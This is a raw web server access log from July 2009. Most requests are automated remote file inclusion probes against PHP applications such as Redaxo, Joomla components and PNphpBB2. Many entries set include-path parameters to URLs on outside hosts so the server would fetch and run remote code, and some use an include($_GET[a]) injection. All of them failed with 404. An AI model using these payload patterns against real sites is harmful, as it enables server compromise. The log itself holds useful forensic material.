195.206.99.238 - - [20/Jul/2009:03:02:03 -0400] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 259 "-" "libwww-perl/5.76"
59.125.245.181 - - [20/Jul/2009:03:02:09 -0400] "GET /logs/access_log.Q109070600%20%20/errors.php?error=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.206.99.238 - - [20/Jul/2009:03:02:34 -0400] "GET /logs/access_log.Q109053100//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 281 "-" "libwww-perl/5.76"
59.125.245.181 - - [20/Jul/2009:03:02:45 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:03:03:08 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.6.155.240 - - [20/Jul/2009:03:03:09 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.nsau.edu.ru//images/banners/lib/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jul/2009:03:03:12 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jul/2009:03:03:12 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jul/2009:03:03:12 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jul/2009:03:03:12 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
122.164.45.42 - - [20/Jul/2009:03:03:33 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1)"
122.164.45.42 - - [20/Jul/2009:03:03:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1)"
122.164.45.42 - - [20/Jul/2009:03:03:35 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1)"
122.164.45.42 - - [20/Jul/2009:03:03:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1)"
61.78.62.84 - - [20/Jul/2009:03:04:58 -0400] "GET //pollphp/db//booth.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:04:58 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:04:58 -0400] "GET /logs/access_log.Q109051800//pollphp/db//booth.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:05:06 -0400] "GET /logs/access_log.Q109051800//pollphp/db//booth.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:05:06 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:05:07 -0400] "GET //pollphp/db//booth.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:05:07 -0400] "GET //pollphp/db//booth.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:05:07 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:05:07 -0400] "GET /logs/access_log.Q109051800//pollphp/db//booth.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:05:16 -0400] "GET /logs/access_log.Q109070200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:05:17 -0400] "GET /logs/access_log.Q109051800%20%20//pollphp/db//booth.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:05:17 -0400] "GET /logs//pollphp/db//booth.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:05:20 -0400] "GET //pollphp/db//booth.php?include_path=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
81.177.9.32 - - [20/Jul/2009:03:05:23 -0400] "GET /logs/access_log.Q109052600%20%20//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
81.177.9.32 - - [20/Jul/2009:03:05:23 -0400] "GET /logs/access_log.Q109053100%20%20//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.thebalvenie.com//files/id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:03:05:28 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:03:05:28 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:03:05:28 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:03:05:28 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:05:36 -0400] "GET /logs/access_log.Q109062000%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.aboutav.com//Scripts/id1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:05:46 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:05:50 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:03:05:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
125.248.88.155 - - [20/Jul/2009:03:06:09 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.248.88.155 - - [20/Jul/2009:03:06:09 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.248.88.155 - - [20/Jul/2009:03:06:09 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:06:09 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:06:18 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:03:06:39 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.10.63.163 - - [20/Jul/2009:03:06:39 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:06:45 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:06:46 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:06:50 -0400] "GET //modules/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:06:59 -0400] "GET /logs//modules/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:06:59 -0400] "GET /logs/access_log.Q109053100//modules/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:07:00 -0400] "GET /logs/access_log.Q109070800//modules/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
210.218.5.234 - - [20/Jul/2009:03:07:07 -0400] "GET //index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.218.5.234 - - [20/Jul/2009:03:07:07 -0400] "GET /logs/access_log.Q109061600//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
210.218.5.234 - - [20/Jul/2009:03:07:07 -0400] "GET /logs//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.218.5.234 - - [20/Jul/2009:03:07:07 -0400] "GET /logs/access_log.Q109053100//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:07:12 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:07:12 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
195.206.99.238 - - [20/Jul/2009:03:07:34 -0400] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 254 "-" "libwww-perl/5.76"
125.248.88.155 - - [20/Jul/2009:03:08:00 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=login///index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:08:24 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:08:25 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:08:37 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:08:37 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:08:58 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:08:58 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:09:05 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:09:06 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:09:36 -0400] "GET /logs//modules/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:09:36 -0400] "GET //modules/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:09:41 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
61.78.62.84 - - [20/Jul/2009:03:10:09 -0400] "GET /logs/access_log.Q109070800%20%20//modules/errors.php?error=http://www.dracocafe.pl/sklep/components/com_sef/1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
65.254.32.2 - - [20/Jul/2009:03:10:46 -0400] "GET /logs/access_log.Q109051200//trans/trans.php?trans=&page=http://www.orkutfotos.kit.net/remember.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.254.32.2 - - [20/Jul/2009:03:10:47 -0400] "GET /logs/access_log.Q109070400//trans/trans.php?trans=&page=http://www.orkutfotos.kit.net/remember.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
65.254.32.2 - - [20/Jul/2009:03:10:47 -0400] "GET /logs//trans/trans.php?trans=&page=http://www.orkutfotos.kit.net/remember.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:10:47 -0400] "GET /logs/access_log.Q109051200//trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 241 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:10:47 -0400] "GET /logs/access_log.Q109070400//trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 241 "-" "Mozilla/5.0"
65.254.32.2 - - [20/Jul/2009:03:10:47 -0400] "GET //trans/trans.php?trans=&page=http://www.orkutfotos.kit.net/remember.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:10:49 -0400] "GET /logs//trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:10:50 -0400] "GET //trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:10:53 -0400] "GET /logs//trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:10:53 -0400] "GET /logs/access_log.Q109051200//trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 241 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:10:54 -0400] "GET /logs/access_log.Q109070400//trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 241 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:10:54 -0400] "GET //trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:03:10:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.254.32.2 - - [20/Jul/2009:03:11:13 -0400] "GET /logs/access_log.Q109070400%20%20//trans/trans.php?trans=&page=http://www.orkutfotos.kit.net/remember.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
65.254.32.2 - - [20/Jul/2009:03:11:13 -0400] "GET //trans/trans.php?trans=&page=http://www.orkutfotos.kit.net/remember.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
65.254.32.2 - - [20/Jul/2009:03:11:13 -0400] "GET /logs//trans/trans.php?trans=&page=http://www.orkutfotos.kit.net/remember.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
65.254.32.2 - - [20/Jul/2009:03:11:13 -0400] "GET /logs/access_log.Q109051200%20%20//trans/trans.php?trans=&page=http://www.orkutfotos.kit.net/remember.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:11:40 -0400] "GET //trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:11:42 -0400] "GET /logs//trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:11:44 -0400] "GET /logs/access_log.Q109070400%20%20//trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 243 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:11:49 -0400] "GET //trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 214 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:11:49 -0400] "GET /logs/access_log.Q109070400%20%20//trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 243 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:11:49 -0400] "GET /logs//trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 219 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:11:50 -0400] "GET /logs/access_log.Q109051200%20%20//trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 243 "-" "Mozilla/5.0"
216.107.223.38 - - [20/Jul/2009:03:11:51 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://www.4ieg.com/sf/lib/debug/fatal1.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
195.186.64.207 - - [20/Jul/2009:03:11:56 -0400] "GET /logs/access_log.Q109051200%20%20//trans/trans.php?trans=&page=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.0" 404 243 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:13:57 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:13:57 -0400] "GET /logs/access_log.Q109061800%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:13:57 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:14:24 -0400] "GET /logs/access_log.Q109070700//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
123.143.98.5 - - [20/Jul/2009:03:14:24 -0400] "GET /logs/access_log.Q109060300//components/com_performs/performs.php?mosConfig_absolute_path=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:03:14:26 -0400] "GET /plugins/stats/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
114.200.199.144 - - [20/Jul/2009:03:14:46 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:03:14:47 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:03:14:47 -0400] "GET ///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jul/2009:03:15:01 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.145.1 - - [20/Jul/2009:03:15:01 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:03:15:06 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:03:15:06 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:03:15:06 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:03:15:15 -0400] "GET /logs/access_log.Q109061700%20%20///vwar/backup/errors.php?error=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:03:15:26 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.248.150.52 - - [20/Jul/2009:03:15:37 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
65.254.32.2 - - [20/Jul/2009:03:15:38 -0400] "GET /logs//trans/trans.php?trans=&page=http://www.orkutfotos.kit.net/remember.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
65.254.32.2 - - [20/Jul/2009:03:15:38 -0400] "GET /logs/access_log.Q109051200//trans/trans.php?trans=&page=http://www.orkutfotos.kit.net/remember.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
